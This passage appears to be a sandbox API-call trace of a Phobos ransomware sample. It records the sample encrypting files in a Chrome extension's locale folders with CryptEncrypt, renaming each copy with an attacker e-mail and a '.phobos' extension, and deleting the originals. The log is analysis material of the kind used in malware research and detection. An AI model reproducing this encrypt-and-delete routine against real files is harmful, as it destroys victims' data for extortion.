dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.617] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0154.617] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.617] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc7, lpOverlapped=0x0) returned 1 [0154.618] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0154.618] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0154.619] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0154.619] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.619] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.619] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.619] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.619] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.619] CloseHandle (hObject=0x130) returned 1 [0154.670] CloseHandle (hObject=0x14c) returned 1 [0154.670] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json")) returned 1 [0154.671] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.672] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=187) returned 1 [0154.672] CloseHandle (hObject=0x14c) returned 1 [0154.672] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json")) returned 0x2020 [0154.672] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.672] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.672] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.673] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.673] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.673] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbb, lpOverlapped=0x0) returned 1 [0154.673] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0154.673] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0154.674] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.674] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.674] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.674] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.674] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.674] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.674] CloseHandle (hObject=0x14c) returned 1 [0154.674] CloseHandle (hObject=0x130) returned 1 [0154.675] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json")) returned 1 [0154.675] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.676] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=178) returned 1 [0154.676] CloseHandle (hObject=0x130) returned 1 [0154.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json")) returned 0x2020 [0154.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.676] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.676] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.677] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.677] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.677] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb2, lpOverlapped=0x0) returned 1 [0154.678] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0154.678] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0154.679] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.679] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.679] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.679] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.679] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.679] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.679] CloseHandle (hObject=0x130) returned 1 [0154.679] CloseHandle (hObject=0x14c) returned 1 [0154.679] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json")) returned 1 [0154.680] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.681] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=182) returned 1 [0154.681] CloseHandle (hObject=0x14c) returned 1 [0154.681] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json")) returned 0x2020 [0154.681] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.682] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.682] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.682] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.682] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.682] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb6, lpOverlapped=0x0) returned 1 [0154.683] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0154.683] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0154.684] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.684] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.684] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.684] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.684] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.684] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.684] CloseHandle (hObject=0x14c) returned 1 [0154.684] CloseHandle (hObject=0x130) returned 1 [0154.685] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json")) returned 1 [0154.685] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.686] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=362) returned 1 [0154.686] CloseHandle (hObject=0x130) returned 1 [0154.686] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json")) returned 0x2020 [0154.686] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.686] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.686] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.687] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.687] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.687] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x16a, lpOverlapped=0x0) returned 1 [0154.687] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170, dwBufLen=0x170 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170) returned 1 [0154.687] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x170, lpOverlapped=0x0) returned 1 [0154.688] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.688] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.688] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.688] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.688] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, 